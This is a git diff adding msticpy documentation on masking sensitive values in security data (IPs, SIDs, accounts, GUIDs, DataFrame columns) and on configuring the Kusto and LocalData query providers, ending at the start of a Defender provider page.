+
+hash_item
+~~~~~~~~~
+
+:py:func:`hash_item<msticpy.data.data_obfus.hash_item>`
+allows specification of delimiters. This is useful for preserving the
+look of domains, emails, etc.
+
+
+.. parsed-literal::
+
+
+    Hash a simple string.
+
+    Parameters
+    ----------
+    input_item : str
+        The input string
+    delim: str, optional
+        A string of delimiters to use to split the input string
+        prior to hashing.
+
+    Returns
+    -------
+    str
+        The masked output string
+
+
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_item('sensitive data', delim=' ')
+    kdneqoiia laoe
+
+    > hash_item('most-sensitive-data/here', delim=' /-')
+    kmea-kdneqoiia-laoe/fcec
+
+
+
+hash_ip
+~~~~~~~
+
+:py:func:`hash_ip<msticpy.data.data_obfus.hash_ip>`
+will output random mappings of input IP V4 and V6 addresses.
+For IPV4 addresses this works by creating a random mapping of each byte
+of the address. So multiple occurrences of the the same IP address will
+be converted to the same randomized output address.
+The mapping remains for the Python session.
+
+Some special IP addresses (localhost, 0.0.0.0) and the prefixes of
+reserved private addresses are preserved.
+
+.. warning:: No checking is done for collisions with public IPs that
+   get randomly mapped to a 10.x.x.x or other private address spaces.
+
+.. note:: IPV6 addresses have their individual components hashed to a
+   hex string and do not use this mapping. This should still result in
+   a given input IP address being mapped to the same masked address.
+   The output IPV6 address will usually not be a valid IP address though.
+
+
+.. parsed-literal::
+
+
+    Hash IP address or list of IP addresses.
+
+    Parameters
+    ----------
+    input_item : Union[List[str], str]
+        List of IP addresses or single IP address.
+
+    Returns
+    -------
+    Union[List[str], str]
+        List of hashed addresses or single address.
+        (depending on input)
+
+
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_ip('192.168.3.1')
+    160.21.239.194
+
+    > hash_ip('2001:0db8:85a3:0000:0000:8a2e:0370:7334')
+    85d6:7819:9cce:9af1:9af1:24ad:d338:7d03
+
+    > hash_ip('['192.168.3.1', '192.168.5.2', '192.168.10.2']')
+    ['160.21.239.194', '160.21.103.84', '160.21.149.84']
+
+    > hash_ip("127.0.0.1")
+    '127.0.0.1'
+
+    # private network prefixes preserved
+    > hash_ip("10.1.23.456")
+    '10.19.74.1'
+
+    > hash_ip("192.168.23.456")
+    '192.168.80.1'
+
+
+hash_sid
+~~~~~~~~
+
+:py:func:`hash_sid<msticpy.data.data_obfus.hash_sid>`
+will randomize the domain-specific parts of a Windows SID.
+It preserves built-in SIDs and well known RIDs (e.g. Admins '-500' RID will be
+preserved in the masked output). Built-in SIDs (such as LocalSystem and
+NetworkService are preserved as-is.
+
+.. parsed-literal::
+
+
+    Hash a SID preserving well-known SIDs and the RID.
+
+    Parameters
+    ----------
+    sid : str
+        SID string
+
+    Returns
+    -------
+    str
+        Hashed SID
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_sid('S-1-5-21-1180699209-877415012-3182924384-1004')
+    S-1-5-21-3321821741-636458740-4143214142-1004
+
+    > hash_sid('S-1-5-18')
+    S-1-5-18
+
+
+hash_account
+~~~~~~~~~~~~
+
+:py:func:`hash_sid<msticpy.data.data_obfus.hash_account>`
+will randomize an account name while preserving the structure
+and the one-to-one mapping between masked and actual account names.
+It preserves built-in accounts such as "root", "SYSTEM", etc.
+
+.. parsed-literal::
+
+
+    Hash an Account to something recognizable.
+
+    Parameters
+    ----------
+    account : str
+        Account name (UPN, NT or simple name)
+
+    Returns
+    -------
+    str
+        Hashed Account
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_account("ian@mydomain.com")
+    'account-#21786@blbbrfbk.pjb'
+
+    > hash_account("NT AUTHORITY/SYSTEM")
+    'NT AUTHORITY/SYSTEM'
+
+    > hash_account("sams_linux_user")
+    'account-#26953'
+
+    > hash_account("local service")
+    'local service'
+
+    hash_account("root")
+    'root'
+
+
+hash_list
+~~~~~~~~~
+
+:py:func:`hash_list<msticpy.data.data_obfus.hash_list>`
+will randomize a list of items preserving the list structure but
+treating each element as a simple string to hash.
+
+.. parsed-literal::
+
+
+    Hash list of strings.
+
+    Parameters
+    ----------
+    item_list : List[str]
+        Input list
+
+    Returns
+    -------
+    List[str]
+        Hashed list
+
+
+**Examples**
+
+.. code:: ipython3
+
+    >> hash_list('['S-1-5-21-1180699209-877415012-3182924384-1004', 'S-1-5-18']')
+    ['elkbjiboklpknokdeflikamojqjflqmicqiorqfbqboqe', 'nrllmpbd']
+
+
+
+hash_dict
+~~~~~~~~~
+
+:py:func:`hash_dict<msticpy.data.data_obfus.hash_dict>`
+will randomize a dict of items preserving the structure and the name of
+the dictionary keys. Only the values of the keys are hashed.
+
+.. parsed-literal::
+
+
+    Hash dictionary values.
+
+    Parameters
+    ----------
+    item_dict : Dict[str, Union[Dict[str, Any], List[Any], str]]
+        Input item can be a Dict of strings, lists or other
+        dictionaries.
+
+    Returns
+    -------
+    Dict[str, Any]
+        Dictionary with hashed values.
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_dict('{'SID1': 'S-1-5-21-1180699209-877415012-3182924384-1004', 'SID2': 'S-1-5-18'}')
+    {'SID1': 'elkbjiboklpknokdeflikamojqjflqmicqiorqfbqboqe', 'SID2': 'nrllmpbd'}
+
+
+
+replace_guid
+~~~~~~~~~~~~
+
+:py:func:`replace_guid<msticpy.data.data_obfus.replace_guid>`
+will output a random UUID mapped to the input.
+The same input UUUD will be mapped to the same newly-generated output UUID
+for the current Python session.
+
+In the example below you can see that UUID #4 is the same as #1 and mapped
+to the same output UUID.
+
+
+.. parsed-literal::
+
+
+    Replace GUID/UUID with mapped random UUID.
+
+    Parameters
+    ----------
+    guid : str
+        Input UUID.
+
+    Returns
+    -------
+    str
+        Mapped UUID
+
+
+**Examples**
+
+.. code:: ipython3
+
+    > replace_guid('cf1b0b29-08ae-4528-839a-5f66eca2cce9')
+    9ef6c321-14f3-4681-8c3b-b596de52d8b0
+
+    > replace_guid('ed63d29e-6288-4d66-b10d-8847096fc586')
+    219a5b0c-3985-49cc-9016-7b23a98c3d53
+
+    > replace_guid('ac561203-99b2-4067-a525-60d45ea0d7ff')
+    8e8ec1e1-6df6-4b41-bbff-b73b1614430b
+
+    > replace_guid('cf1b0b29-08ae-4528-839a-5f66eca2cce9')
+    9ef6c321-14f3-4681-8c3b-b596de52d8b0
+
+
+
+Masking DataFrames
+------------------
+
+We can use the msticpy pandas extension to mask the data in an entire
+DataFrame.
+
+See :py:meth:`mp_obf.obfuscate<msticpy.data.data_obfus.ObfuscationAccessor.mask>`
+
+The masking library contains a mapping for a number of common field
+names. You can view this list by displaying the attribute:
+
+::
+
+   data_obfus.OBFUS_COL_MAP
+
+In the first example, the TenantId, ResourceGroup, VMName have been
+masked.
+
+.. code:: ipython3
+
+    display(netflow_df.head(3))
+    netflow_df.head(3).mp_mask.mask()
+
+.. warning:: The pandas extension and method were renamed from
+   msticpy 0.9.0 from mp_obfus.obfuscate() to mp_mask.mask()
+
+
+
+Input DataFrame
+
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+TenantId                              TimeGenerated            FlowStartTime            ResourceGroup          VMName           VMIPAddress    PublicIPs                             SrcIP    DestIP  L4Protocol    AllExtIPs
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.697  2019-02-12 13:00:07.000  asihuntomsworkspacerg  msticalertswin1  10.0.3.5       ['65.55.44.109']                        nan       nan  T             65.55.44.109
+52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  asihuntomsworkspacerg  msticalertswin1  10.0.3.5       ['13.71.172.130', '13.71.172.128']      nan       nan  T             13.71.172.128
+52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  asihuntomsworkspacerg  msticalertswin1  10.0.3.5       ['13.71.172.130', '13.71.172.128']      nan       nan  T             13.71.172.130
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+
+Output DataFrame
+
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+TenantId                              TimeGenerated            FlowStartTime            ResourceGroup          VMName           VMIPAddress    PublicIPs                             SrcIP    DestIP  L4Protocol    AllExtIPs
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.697  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  msticalertswin1  10.0.3.5       ['65.55.44.109']                        nan       nan  T             65.55.44.109
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  msticalertswin1  10.0.3.5       ['13.71.172.130', '13.71.172.128']      nan       nan  T             13.71.172.128
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  msticalertswin1  10.0.3.5       ['13.71.172.130', '13.71.172.128']      nan       nan  T             13.71.172.130
+====================================  =======================  =======================  =====================  ===============  =============  ==================================  =======  ========  ============  =============
+
+TenantId and ResourceGroup have been masked but VMName and the IPAddress fields have not.
+
+
+
+
+Adding custom column mappings
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In the previous example you probably spotted that the VMIPAddress, PublicIPs and
+AllExtIPs columns were all unchanged. This is because there is no default mapping
+for these column names in the builtin mapping table.
+
+We can add these columns to a custom mapping dictionary and re-run the
+obfuscation. See the later section on :ref:`creating_custom_mappings`.
+
+.. code:: ipython3
+
+    col_map = {
+        "VMName": ".",
+        "VMIPAddress": "ip",
+        "PublicIPs": "ip",
+        "AllExtIPs": "ip"
+    }
+
+    netflow_df.head(3).mp_mask.mask(column_map=col_map)
+
+Output DataFrame after applying custom column mappings
+
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+TenantId                              TimeGenerated            FlowStartTime            ResourceGroup          VMName           VMIPAddress      PublicIPs                             SrcIP    DestIP  L4Protocol    AllExtIPs
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.697  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['62.100.208.57']                       nan       nan  T             62.100.208.57
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['156.64.40.139', '156.64.40.236']      nan       nan  T             156.64.40.236
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['156.64.40.139', '156.64.40.236']      nan       nan  T             156.64.40.139
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+
+
+mask_df
+~~~~~~~~~~~~
+
+You can also call the standard function
+:py:func:`obfuscate_df<msticpy.data.data_obfus.mask_df>` to perform the
+same operation on the DataFrame passed as the *data* parameter.
+
+.. warning:: This function was renamed from obfuscate_df to mask_df in
+   msticpy 0.9.0. The previous function name still exists as an alias of
+   mask_df
+
+.. code:: ipython3
+
+    data_obfus.obfuscate_df(data=netflow_df.head(3), column_map=col_map)
+
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+TenantId                              TimeGenerated            FlowStartTime            ResourceGroup          VMName           VMIPAddress      PublicIPs                             SrcIP    DestIP  L4Protocol    AllExtIPs
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.697  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['62.100.208.57']                       nan       nan  T             62.100.208.57
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['156.64.40.139', '156.64.40.236']      nan       nan  T             156.64.40.236
+68a5a31d-7516-4c54-ad27-3b1360ce0b56  2019-02-12 14:22:40.681  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn  149.172.239.103  ['156.64.40.139', '156.64.40.236']      nan       nan  T             156.64.40.139
+====================================  =======================  =======================  =====================  ===============  ===============  ==================================  =======  ========  ============  =============
+
+
+.. _creating_custom_mappings:
+
+Creating custom mappings
+------------------------
+
+A custom mapping dictionary has entries in the following form:
+
+::
+
+       "ColumnName": "operation"
+
+The *operation* defines the type of masking method used for that
+column. Both the column and the operation code must be quoted.
+
+============== ====================
+operation code masking function
+============== ====================
+“uuid”         replace_guid
+“ip”           hash_ip
+“str”          hash_string
+“dict”         hash_dict
+“list”         hash_list
+“sid”          hash_sid
+“null”         “null”\*
+None           hash_str\*
+delims_str     hash_item\*
+============== ====================
+
+\*The last three items require some explanation:
+
+- null - the *null* operation code means set the value to empty -
+  i.e. delete the value in the output frame.
+- None (i.e. the dictionary value is *None*) default
+  to hash_string.
+- *delims_str* - any string other than those named above
+  is assumed to be a string of delimiters.
+
+See next section for a discussion of use of delimiters.
+
+
+.. note:: If you want to *only* use custom mappings and ignore the
+   builtin mapping table, specify *use_default=False* as a parameter
+   to either *mp_mask.mask()* or *mask_df*.
+
+
+Using *hash_item* to preserve the structure/look of the hashed input
+--------------------------------------------------------------------
+
+Using hash_item with a delimiters string lets you create output that
+reflects the structure of the input. The delimiters string is specified as
+a simple string of delimiter characters, e.g. *"@\,-"*
+
+The input string is broken into substrings using each of the delimiters
+in the delims_str. The substrings are individually hashed and the
+resulting substrings joined together using the original delimiters. The
+string is split in the order of the characters in the delims string.
+
+This allows you to create hashed values that bear some resemblance to
+the original structure of the string. This might be useful for email
+address, qualified domain names and other structure text.
+
+For example : "ian@mydomain.com"
+
+Using the simple *hash_string* function the output bears no
+resemblance to an email address
+
+.. code:: ipython3
+
+    hash_string("ian@mydomain.com")
+
+
+.. parsed-literal::
+
+    'prqocjmdpbodrafn'
+
+
+
+Using *hash_item* and specifying the expected delimiters we get
+something like an email address in the output.
+
+.. code:: ipython3
+
+    hash_item("ian@mydomain.com", "@.")
+
+
+
+.. parsed-literal::
+
+    'bnm@blbbrfbk.pjb'
+
+
+
+You use *hash_item* in your Custom Mapping dictionary by specifying a
+delimiters string as the *operation*.
+
+Checking Your Masking Results
+-----------------------------
+
+Use the :py:func:`check_masking<msticpy.data.data_obfus.check_masking>`
+function to ensure that you have masked all of the data columns that
+you need.
+
+Use ``silent=False`` to print out the results.
+If you use ``silent=True`` (the default) it will return 2 lists of ``unchanged`` and
+``obfuscated`` columns.
+
+.. note:: by default this will check only the first row of the data.
+   You can check other rows using the index parameter.
+
+.. warning:: The two DataFrames should have a matching index and ordering because
+   the check works by comparing the values in each column, judging that
+   column values that do not match have been masked.
+
+
+We create partially and fully masked DataFrames to test and run the
+check against the first of these. We can see that several important columns
+are listed as unchanged.
+
+.. code:: ipython3
+
+    partly_obfus_df = netflow_df.head(3).mp_mask.mask()
+    fully_obfus_df = netflow_df.head(3).mp_mask.mask(column_map=col_map)
+
+    data_obfus.check_obfuscation(partly_obfus_df, netflow_df.head(3), silent=False)
+
+.. parsed-literal::
+
+    ===== Start Check ====
+    Unchanged columns:
+    ------------------
+    AllExtIPs: 65.55.44.109
+    FlowStartTime: 2019-02-12 13:00:07.000
+    L4Protocol: T
+    PublicIPs: ['65.55.44.109']
+    TimeGenerated: 2019-02-12 14:22:40.697
+    VMIPAddress: 10.0.3.5
+    VMName: msticalertswin1
+
+    Obfuscated columns:
+    --------------------
+    DestIP:   nan ----> nan
+    ResourceGroup:   asihuntomsworkspacerg ----> ibmkajbmepnmiaeilfofa
+    SrcIP:   nan ----> nan
+    TenantId:   52b1ab41-869e-4138-9e40-2a4457f09bf0 ----> 56260b2e-9d3f-4ad9-8e65-e4a9230fd5aa
+    ====== End Check =====
+
+
+Test the fully masked data, we can see that all desired columns have
+been transformed.
+
+.. code:: ipython3
+
+    data_obfus.check_masking(fully_obfus_df, netflow_df.head(3), silent=False)
+
+.. parsed-literal::
+
+    ===== Start Check ====
+    Unchanged columns:
+    ------------------
+    FlowStartTime: 2019-02-12 13:00:07.000
+    L4Protocol: T
+    TimeGenerated: 2019-02-12 14:22:40.697
+
+    Obfuscated columns:
+    --------------------
+    AllExtIPs:   65.55.44.109 ----> 239.3.143.131
+    DestIP:   nan ----> nan
+    PublicIPs:   ['65.55.44.109'] ----> ['239.3.143.131']
+    ResourceGroup:   asihuntomsworkspacerg ----> ibmkajbmepnmiaeilfofa
+    SrcIP:   nan ----> nan
+    TenantId:   52b1ab41-869e-4138-9e40-2a4457f09bf0 ----> 56260b2e-9d3f-4ad9-8e65-e4a9230fd5aa
+    VMIPAddress:   10.0.3.5 ----> 224.21.98.125
+    VMName:   msticalertswin1 ----> fmlmbnlpdcbnbnn
+    ====== End Check =====
diff --git a/docs/source/data_acquisition/DataProv-Kusto.rst b/docs/source/data_acquisition/DataProv-Kusto.rst
new file mode 100644
index 000000000..40f2e6b2a
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-Kusto.rst
@@ -0,0 +1,267 @@
+Azure Data Explorer/Kusto Provider
+==================================
+
+Kusto Configuration
+-------------------
+
+Kusto Configuration in MSTICPy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following two examples:
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      Kusto:
+        Args:
+          Cluster: https://mstic.kusto.windows.net
+          IntegratedAuth: True
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      Kusto:
+        Args:
+          Cluster: https://msticapp.kusto.windows.net
+          ClientId: 69d28fd7-42a5-48bc-a619-af56397b1111
+          TenantId: 69d28fd7-42a5-48bc-a619-af56397b9f28
+          ClientSecret: "[PLACEHOLDER]"
+
+
+We strongly recommend storing the client secret value
+in Azure Key Vault. You can replace the text value with a referenced
+to a Key Vault secret using the MSTICPy configuration editor.
+
+Your configuration when using Key Vault should look like the following:
+
+.. code:: yaml
+
+        Kusto:
+          Args:
+            Cluster: https://msticapp.kusto.windows.net
+            ClientId: 69d28fd7-42a5-48bc-a619-af56397b1111
+            TenantId: 69d28fd7-42a5-48bc-a619-af56397b9f28
+            ClientSecret:
+              KeyVault:
+
+You can create multiple instances of the Kusto settings for
+multiple clusters by adding
+an instance string to the "Kusto" section names
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      Kusto-mstic:
+        Args:
+          Cluster: https://mstic.kusto.windows.net
+          IntegratedAuth: True
+      Kusto-msticapp:
+        Args:
+          Cluster: https://msticapp.kusto.windows.net
+          ClientId: 69d28fd7-42a5-48bc-a619-af56397b1111
+          TenantId: 69d28fd7-42a5-48bc-a619-af56397b9f28
+          ClientSecret:
+            KeyVault:
+
+
+Data Query Format for Kusto clusters
+------------------------------------
+
+The query template format for Kusto queries should look like
+the following.
+
+.. code:: yaml
+
+    metadata:
+        version: 1
+        description: Kusto Queries
+        data_environments: [Kusto]
+        data_families: [DeviceEvents.hostdata]
+        cluster: https://msticapp.kusto.windows.net
+        tags: ["user"]
+    defaults:
+      parameters:
+        table:
+            description: Table name
+            type: str
+            default: "DeviceProcessEvents"
+        start:
+            description: Query start time
+            type: datetime
+            default: -30
+        end:
+            description: Query end time
+            type: datetime
+            default: 0
+        add_query_items:
+            description: Additional query clauses
+            type: str
+            default: ""
+    sources:
+        list_host_processes:
+            description: Lists all process creations for a host
+            metadata:
+            args:
+            query: '
+                {table}
+                | where Timestamp >= datetime({start})
+                | where Timestamp <= datetime({end})
+                | where DeviceName has "{host_name}"
+                {add_query_items}'
+            uri: None
+            parameters:
+            host_name:
+                description: Name of host
+                type: str
+
+Most of the query file is identical to queries for other drivers.
+However, the metadata section has additional items.
+
+.. code-block:: yaml
+   :emphasize-lines: 4, 5, 6
+
+    metadata:
+        version: 1
+        description: Kusto Queries
+        data_environments: [Kusto]
+        data_families: [ALIAS.DATABASE]
+        cluster: KUSTO_CLUSTER_URI
+
+
+The ``data_environments`` item must include "Kusto" in the list of
+applicable environments.
+
+The ``data_families`` item is composed of two parts, separated by a ".":
+
+- the first half is friendly name or alias that will be used as a prefix
+  when the queries are added to the query provider.
+- the second part is the Kusto database containing the data to be queried.
+
+The ``cluster`` item must match the ``Cluster`` setting in the *msticpyconfig*
+setting described in the previous section.
+
+Here is an example.
+
+.. code-block:: yaml
+
+    metadata:
+        version: 1
+        description: Kusto Queries
+        data_environments: [Kusto]
+        data_families: [DeviceEvents.hostdata]
+        cluster: https://msticapp.kusto.windows.net
+
+Queries using this metadata would be accessed and run as follows:
+
+.. code:: ipython3
+
+    kql_prov.DeviceEvents.list_host_processes(host_name=....)
+
+The file-level ``metadata`` section applies to all queries in the file by
+default. You can specify a metadata section for individual queries. Any
+settings here will override the file-level settings.
+
+The example below shows overriding the ``data_families`` and ``cluster``
+entries for an individual query.
+
+.. code:: yaml
+
+    metadata:
+        version: 1
+        description: Kusto Queries
+        data_environments: [Kusto]
+        data_families: [DeviceEvents.hostdata]
+        cluster: https://msticapp.kusto.windows.net
+        tags: ["user"]
+    defaults:
+      parameters:
+        table:
+            description: Table name
+            type: str
+            default: "DeviceProcessEvents"
+        # ...
+    sources:
+        list_host_processes:
+            description: Lists all process creations for a host
+            metadata:
+                data_families: [DeviceEvents.scrubbeddata]
+                cluster: https://msticapp.kusto.windows.net
+            args:
+            query: '
+                {table}
+                | where Timestamp >= datetime({start})
+                | where Timestamp <= datetime({end})
+                | where DeviceName has "{host_name}"
+                {add_query_items}'
+            uri: None
+            parameters:
+            host_name:
+                description: Name of host
+                type: str
+
+Loading a QueryProvider for Kusto
+---------------------------------
+
+.. code:: ipython3
+
+        kql_prov = QueryProvider("Kusto")
+
+
+
+Connecting to a Kusto cluster
+-----------------------------
+
+The parameters required for connection to a Kusto cluster can be passed in
+a number of ways. The simplest is to configure your settings
+in msticpyconfig. You can then just call connect with no parameters.
+
+.. code:: ipython3
+
+        kql_prov.DeviceEvents.list_host_processes(
+            host_name="my_host",
+            cluster="https://somecluster."
+        )
+
+
+If you have configured multiple instances you must specify
+an instance name when you call connect.
+
+.. code:: ipython3
+
+        kql_prov.connect(cluster="msticapp")
+
+
+You can also pass connection parameters as
+keyword arguments or a connection string.
+
+Additional Kusto query parameters
+---------------------------------
+
+You can also override the cluster and database for an individual
+query by supply the ``cluster`` and/or ``database`` parameters
+as query parameters.
+
+
+.. code:: ipython3
+
+        kql_prov.DeviceEvents.list_host_processes(
+            host_name="my_host",
+            cluster="https://somecluster.kusto.windows.net",
+            database="archive"
+            ...
+        )
+
+
+Other Kusto Documentation
+-----------------------------------
+
+:py:mod:`Kusto driver API documentation<msticpy.data.drivers.kusto_driver>`
\ No newline at end of file
diff --git a/docs/source/data_acquisition/DataProv-LocalData.rst b/docs/source/data_acquisition/DataProv-LocalData.rst
new file mode 100644
index 000000000..fd9853cb7
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-LocalData.rst
@@ -0,0 +1,207 @@
+The LocalData provider
+======================
+
+:py:mod:`LocalData driver documentation<msticpy.data.drivers.local_data_driver>`
+
+The ``LocalData`` data provider is intended primarily for testing or demonstrations
+where you may not be able to connect to an online data source reliably.
+
+The data backing this driver can be in the form of a pickled pandas DataFrame
+or a CSV file. In either case the data is converted to a DataFrame to be returned
+from the query. Usage of this driver is a little different to most other drivers:
+
+* You will need to provide a path to your data files when initializing
+  the query provider (by default it will search in the current folder).
+* You will also need to provide a query definition file (see following
+  example) that maps the data file names that you are using to
+  query names. The path to search for this is specified in the ``query_paths``
+  parameter (see code examples below).
+* Parameters to queries are ignored.
+
+LocalData Configuration
+-----------------------
+
+LocalData Configuration in MSTICPy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      LocalData:
+          data_paths:
+            - /home/user1/sample_data
+            - /home/shared/sample_data
+
+
+Creating a LocalData Query File
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To define the queries you need to create a query definition file.
+This is an example of a LocalData yaml query file. It is similar to the query
+definition files for other providers but simpler. It only requires a
+description, the data family that the query should be grouped under and
+the name of the file containing the data.
+
+.. code:: yaml
+
+    metadata:
+        version: 1
+        description: Local Data Alert Queries
+        data_environments: [LocalData]
+        data_families: [SecurityAlert, WindowsSecurity, Network]
+        tags: ['alert', 'securityalert', 'process', 'account', 'network']
+    defaults:
+    sources:
+        list_alerts:
+            description: Retrieves list of alerts
+            metadata:
+                data_families: [SecurityAlert]
+            args:
+                query: alerts_list.pkl
+            parameters:
+        list_host_logons:
+            description: List logons on host
+            metadata:
+                data_families: [WindowsSecurity]
+            args:
+                query: host_logons.csv
+            parameters:
+        list_network_alerts:
+            description: List network alerts.
+            args:
+                query: net_alerts.csv
+            parameters:
+
+
+In this example the value for the "query" is just the file name.
+If the queries in your file are a mix of data from different data families,
+you can group them by specifying one or more values for ``data_families``.
+If this isn't specified for an individual query, it will inherit the setting
+for ``data_families`` in the global ``metadata`` section at the top of the file.
+Specifying more than one value for ``data_families``
+will add links to the query under each data family grouping. This is to allow
+for cases where a query may be relevant to multiple categories.
+The ``data_families`` control only how the queries appear in query provider and
+don't affect any other aspects of the query operation.
+
+In the example shown, the ``list_alerts`` query has been added to the ``SecurityAlert``
+attribute of the query provider, while ``list_host_logons`` is member of
+``WindowsSecurity``. The entry for ``list_network_alerts`` had no ``data_families``
+attribute so inherits the values from the file's ``metadata``. Since this has multiple
+values, the query is added to all three families.
+
+.. code:: ipython3
+
+    # Structure of the query attributes added to the query provider
+    qry_prov.list_queries()
+
+.. parsed-literal::
+
+    Network.list_host_logons
+    Network.list_network_alerts
+            ...<other queries>
+    SecurityAlert.list_alerts
+    SecurityAlert.list_network_alerts
+            ...<other queries>
+    WindowsSecurity.list_host_logons
+    WindowsSecurity.list_network_alerts
+
+
+Preparing to use the LocalData provider
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+1. Collect your data files into one or more directories or directory trees
+   (the default location to search for data file is the current directory).
+   Subdirectories are searched for ".pkl" and ".csv" files but only file
+   names matching your query definitions will loaded.
+2. Create one or more query definition yaml files (following the pattern above)
+   and place these in a directory (this can be the same as the data files).
+   The query provider will load and merge definitions from multiple YAML files.
+
+QueryProvider defaults to searching for data files in the current directory
+and subdirectories. The default paths for query definition files are a) the
+built-in package queries path (msticpy/data/queries) and b) any custom
+paths that you have added to msticpyconfig.yaml (see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`).
+
+.. note:: The query definition files must have a ``.yaml`` extension.
+
+Loading a QueryProvider for LocalData
+-------------------------------------
+
+This loads a LocalData query provider using configuration defaults.
+
+.. code:: ipython3
+
+    qry_prov = QueryProvider("LocalData")
+
+
+Unless you have configured mstipyconfig to look in specific locations for
+your localdata query and data files, you will need to specify these
+as parameters to QueryProvider.
+
+.. code:: ipython3
+
+    data_path = "./my_data"
+    query_path = "./myqueries"
+    qry_prov = QueryProvider("LocalData", data_paths=[data_path], query_paths=[query_path])
+
+    # list the queries loaded
+    print(qry_prov.list_queries())
+
+
+Connecting to LocalData
+-----------------------
+
+There is no connection step for the LocalData driver.
+
+
+Example usage of LocalData driver
+---------------------------------
+
+.. code:: ipython3
+
+
+    # list the queries loaded
+    print(qry_prov.list_queries())
+
+    # run a query
+    my_alerts = qry_prov.SecurityAlert.list_alerts()
+
+    # Specify path to look for data files
+    data_path = "./my_data"
+    qry_prov = QueryProvider("LocalData", data_paths=[data_path])
+
+    # Show the schema of the data files read in
+    print(qry_prov.schema)
+
+    # Specify both data and query locations
+    data_path = "./my_data"
+    query_path = "./myqueries"
+    qry_prov = QueryProvider("LocalData", data_paths=[data_path], query_paths=[query_path])
+
+    host_logons_df = qry_prov.WindowsSecurity.list_host_logons()
+
+    # parameters are accepted but ignored
+    host_logons_df = qry_prov.WindowsSecurity.list_host_logons(
+        start=st_date,
+        end=end_date,
+        host_name="myhost.com",
+    )
+
+Other LocalData Documentation
+-----------------------------
+
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Local Data`.
+
+:py:mod:`LocalData driver API documentation<msticpy.data.drivers.local_data_driver>`
diff --git a/docs/source/data_acquisition/DataProv-MSDefender.rst b/docs/source/data_acquisition/DataProv-MSDefender.rst
new file mode 100644
index 000000000..09224b387
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-MSDefender.rst
@@ -0,0 +1,152 @@
+Microsoft 365 Defender Provider
+===============================
+
+This driver lets you query the Microsoft Defender APIs.
+
+.. note:: This section applies to both Microsoft 365 Defender and Microsoft Defender
+    for Endpoint (MDE). The former supersedes and is a subset of the the latter
+    but both are still available to use.
+
+    Many components in MSTICPy still use the old abbreviation **MDATP**
+    (Microsoft Advanced Threat Protection).
+
+M365 Defender Configuration
+---------------------------
+
